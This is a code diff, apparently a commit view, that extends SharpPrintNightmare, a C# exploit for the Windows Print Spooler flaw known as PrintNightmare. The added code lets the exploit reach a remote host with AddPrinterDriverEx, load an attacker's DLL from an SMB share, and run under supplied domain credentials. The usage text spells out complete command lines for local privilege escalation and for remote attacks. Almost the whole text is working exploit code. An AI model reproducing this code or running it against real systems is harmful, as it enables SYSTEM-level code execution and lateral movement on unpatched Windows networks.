|
|
@ -2,6 +2,7 @@ |
|
|
|
using System.ComponentModel; |
|
|
|
using System.ComponentModel; |
|
|
|
using System.IO; |
|
|
|
using System.IO; |
|
|
|
using System.Runtime.InteropServices; |
|
|
|
using System.Runtime.InteropServices; |
|
|
|
|
|
|
|
using Tools; |
|
|
|
|
|
|
|
|
|
|
|
namespace SharpPrintNightmare |
|
|
|
namespace SharpPrintNightmare |
|
|
|
{ |
|
|
|
{ |
|
|
@ -45,30 +46,81 @@ namespace SharpPrintNightmare |
|
|
|
static void Main(string[] args) |
|
|
|
static void Main(string[] args) |
|
|
|
{ |
|
|
|
{ |
|
|
|
string dllpath; |
|
|
|
string dllpath; |
|
|
|
|
|
|
|
string pDriverPath = ""; |
|
|
|
|
|
|
|
string path = null; |
|
|
|
|
|
|
|
//network credentials wont be used for LPE |
|
|
|
|
|
|
|
string domain = "NeverGonnaGiveYouUp"; |
|
|
|
|
|
|
|
string user = "NeverGonnaLetYouDown"; |
|
|
|
|
|
|
|
string password = "NeverGonnaRunAroundAndDesertYou"; |
|
|
|
|
|
|
|
|
|
|
|
if (args == null || args.Length == 0) |
|
|
|
if (args == null || args.Length == 0) |
|
|
|
{ |
|
|
|
{ |
|
|
|
Console.WriteLine("Need an argument containing the dll path"); |
|
|
|
Console.WriteLine("-Locally"); |
|
|
|
Console.WriteLine(".\\SharpPrintNightmare.exe C:\\addCube.dll"); |
|
|
|
Console.WriteLine(" .\\SharpPrintNightmare.exe C:\\addCube.dll"); |
|
|
|
|
|
|
|
Console.WriteLine(" .\\SharpPrintNightmare.exe 'C:\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL'"); |
|
|
|
|
|
|
|
Console.WriteLine("-Remote using current context"); |
|
|
|
|
|
|
|
Console.WriteLine(" .\\SharpPrintNightmare.exe '\\\\192.168.1.215\\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL' '\\\\192.168.1.20'"); |
|
|
|
|
|
|
|
Console.WriteLine("-Remote using runas"); |
|
|
|
|
|
|
|
Console.WriteLine(" .\\SharpPrintNightmare.exe '\\\\192.168.1.215\\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL' '\\\\192.168.1.20' hackit.local domain_user Pass123"); |
|
|
|
Environment.Exit(0); |
|
|
|
Environment.Exit(0); |
|
|
|
} |
|
|
|
} |
|
|
|
dllpath = args[0]; |
|
|
|
dllpath = args[0]; |
|
|
|
|
|
|
|
|
|
|
|
Console.WriteLine("[*] Try 1..."); |
|
|
|
if(args.Length > 1) |
|
|
|
addPrinter(dllpath); |
|
|
|
{ |
|
|
|
Console.WriteLine("[*] Try 2..."); |
|
|
|
pDriverPath = args[1]; |
|
|
|
addPrinter(dllpath); |
|
|
|
} |
|
|
|
Console.WriteLine("[*] Try 3..."); |
|
|
|
else |
|
|
|
addPrinter(dllpath); |
|
|
|
{ |
|
|
|
|
|
|
|
DRIVER_INFO_2[] drivers = getDrivers(); |
|
|
|
|
|
|
|
foreach (DRIVER_INFO_2 driver in drivers) |
|
|
|
|
|
|
|
{ |
|
|
|
|
|
|
|
//Console.WriteLine(driver.pDriverPath); //debug |
|
|
|
|
|
|
|
if (driver.pDriverPath.ToLower().Contains("filerepository")) |
|
|
|
|
|
|
|
{ |
|
|
|
|
|
|
|
pDriverPath = driver.pDriverPath; |
|
|
|
|
|
|
|
break; |
|
|
|
|
|
|
|
} |
|
|
|
|
|
|
|
} |
|
|
|
|
|
|
|
//lucky shot |
|
|
|
|
|
|
|
if (pDriverPath == "") |
|
|
|
|
|
|
|
{ |
|
|
|
|
|
|
|
pDriverPath = drivers[0].pDriverPath; |
|
|
|
|
|
|
|
} |
|
|
|
|
|
|
|
pDriverPath = Directory.GetParent(pDriverPath).FullName + "\\UNIDRV.DLL"; |
|
|
|
|
|
|
|
} |
|
|
|
|
|
|
|
if (args.Length > 2) |
|
|
|
|
|
|
|
{ |
|
|
|
|
|
|
|
path = args[2]; |
|
|
|
|
|
|
|
} |
|
|
|
|
|
|
|
if (args.Length > 3) |
|
|
|
|
|
|
|
{ |
|
|
|
|
|
|
|
domain = args[3]; |
|
|
|
|
|
|
|
user = args[4]; |
|
|
|
|
|
|
|
password = args[5]; |
|
|
|
|
|
|
|
} |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
//runas /netonly |
|
|
|
|
|
|
|
using (new Impersonator.Impersonation(domain, user, password)) |
|
|
|
|
|
|
|
{ |
|
|
|
|
|
|
|
Console.WriteLine("[*] Try 1..."); |
|
|
|
|
|
|
|
addPrinter(dllpath, pDriverPath, path); |
|
|
|
|
|
|
|
Console.WriteLine("[*] Try 2..."); |
|
|
|
|
|
|
|
addPrinter(dllpath, pDriverPath, path); |
|
|
|
|
|
|
|
Console.WriteLine("[*] Try 3..."); |
|
|
|
|
|
|
|
addPrinter(dllpath, pDriverPath, path); |
|
|
|
|
|
|
|
} |
|
|
|
} |
|
|
|
} |
|
|
|
|
|
|
|
|
|
|
|
static void addPrinter(string dllpath) |
|
|
|
static void addPrinter(string dllpath, string pDriverPath, string path = null) |
|
|
|
{ |
|
|
|
{ |
|
|
|
DRIVER_INFO_2[] drivers = getDrivers(); |
|
|
|
|
|
|
|
string pDriverPath = Directory.GetParent(drivers[0].pDriverPath).FullName + "\\UNIDRV.DLL"; |
|
|
|
//pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL"; // 2019 debug |
|
|
|
Console.WriteLine($"[*] pDriverPath Found {pDriverPath}"); |
|
|
|
//pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_addb31f9bff9e936\\Amd64\\UNIDRV.DLL"; // 2016 debug |
|
|
|
|
|
|
|
Console.WriteLine($"[*] pDriverPath {pDriverPath}"); |
|
|
|
Console.WriteLine($"[*] Executing {dllpath}"); |
|
|
|
Console.WriteLine($"[*] Executing {dllpath}"); |
|
|
|
|
|
|
|
|
|
|
|
//DRIVER_INFO_2 Level2 = drivers[0]; |
|
|
|
//DRIVER_INFO_2 Level2 = drivers[0]; // debug |
|
|
|
DRIVER_INFO_2 Level2 = new DRIVER_INFO_2(); |
|
|
|
DRIVER_INFO_2 Level2 = new DRIVER_INFO_2(); |
|
|
|
Level2.cVersion = 3; |
|
|
|
Level2.cVersion = 3; |
|
|
|
Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll"; |
|
|
|
Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll"; |
|
|
@ -85,7 +137,7 @@ namespace SharpPrintNightmare |
|
|
|
Marshal.StructureToPtr(Level2, pnt, false); |
|
|
|
Marshal.StructureToPtr(Level2, pnt, false); |
|
|
|
|
|
|
|
|
|
|
|
//call AddPrinterDriverEx |
|
|
|
//call AddPrinterDriverEx |
|
|
|
AddPrinterDriverEx(null, 2, pnt, flags); |
|
|
|
AddPrinterDriverEx(path, 2, pnt, flags); |
|
|
|
Console.WriteLine("[*] Stage 0: " + Marshal.GetLastWin32Error()); |
|
|
|
Console.WriteLine("[*] Stage 0: " + Marshal.GetLastWin32Error()); |
|
|
|
Marshal.FreeHGlobal(pnt); |
|
|
|
Marshal.FreeHGlobal(pnt); |
|
|
|
|
|
|
|
|
|
|
@ -98,10 +150,10 @@ namespace SharpPrintNightmare |
|
|
|
Marshal.StructureToPtr(Level2, pnt2, false); |
|
|
|
Marshal.StructureToPtr(Level2, pnt2, false); |
|
|
|
|
|
|
|
|
|
|
|
//call AddPrinterDriverEx |
|
|
|
//call AddPrinterDriverEx |
|
|
|
AddPrinterDriverEx(null, 2, pnt2, flags); |
|
|
|
AddPrinterDriverEx(path, 2, pnt2, flags); |
|
|
|
int errorcode = Marshal.GetLastWin32Error(); |
|
|
|
int errorcode = Marshal.GetLastWin32Error(); |
|
|
|
Marshal.FreeHGlobal(pnt2); |
|
|
|
Marshal.FreeHGlobal(pnt2); |
|
|
|
if(errorcode == 0) |
|
|
|
if (errorcode == 0) |
|
|
|
{ |
|
|
|
{ |
|
|
|
Console.WriteLine($"[*] Stage {i}: " + errorcode); |
|
|
|
Console.WriteLine($"[*] Stage {i}: " + errorcode); |
|
|
|
Console.WriteLine($"[+] Exploit Completed"); |
|
|
|
Console.WriteLine($"[+] Exploit Completed"); |
|
|
@ -110,11 +162,13 @@ namespace SharpPrintNightmare |
|
|
|
} |
|
|
|
} |
|
|
|
} |
|
|
|
} |
|
|
|
|
|
|
|
|
|
|
|
static DRIVER_INFO_2[] getDrivers() |
|
|
|
static DRIVER_INFO_2[] getDrivers(string path = null) |
|
|
|
{ |
|
|
|
{ |
|
|
|
uint cbNeeded = 0; |
|
|
|
uint cbNeeded = 0; |
|
|
|
uint cReturned = 0; |
|
|
|
uint cReturned = 0; |
|
|
|
if (EnumPrinterDrivers(null, null, 2, IntPtr.Zero, 0, ref cbNeeded, ref cReturned)) |
|
|
|
//path = "\\\\192.168.1.20"; |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
if (EnumPrinterDrivers(path, "Windows x64", 2, IntPtr.Zero, 0, ref cbNeeded, ref cReturned)) |
|
|
|
{ |
|
|
|
{ |
|
|
|
//succeeds, but shouldn't, because buffer is zero (too small)! |
|
|
|
//succeeds, but shouldn't, because buffer is zero (too small)! |
|
|
|
throw new Exception("EnumPrinters should fail!"); |
|
|
|
throw new Exception("EnumPrinters should fail!"); |
|
|
@ -128,7 +182,7 @@ namespace SharpPrintNightmare |
|
|
|
} |
|
|
|
} |
|
|
|
|
|
|
|
|
|
|
|
IntPtr pAddr = Marshal.AllocHGlobal((int)cbNeeded); |
|
|
|
IntPtr pAddr = Marshal.AllocHGlobal((int)cbNeeded); |
|
|
|
if (EnumPrinterDrivers(null, null, 2, pAddr, cbNeeded, ref cbNeeded, ref cReturned)) |
|
|
|
if (EnumPrinterDrivers(path, "Windows x64", 2, pAddr, cbNeeded, ref cbNeeded, ref cReturned)) |
|
|
|
{ |
|
|
|
{ |
|
|
|
DRIVER_INFO_2[] printerInfo2 = new DRIVER_INFO_2[cReturned]; |
|
|
|
DRIVER_INFO_2[] printerInfo2 = new DRIVER_INFO_2[cReturned]; |
|
|
|
long offset; |
|
|
|
long offset; |
|
|
|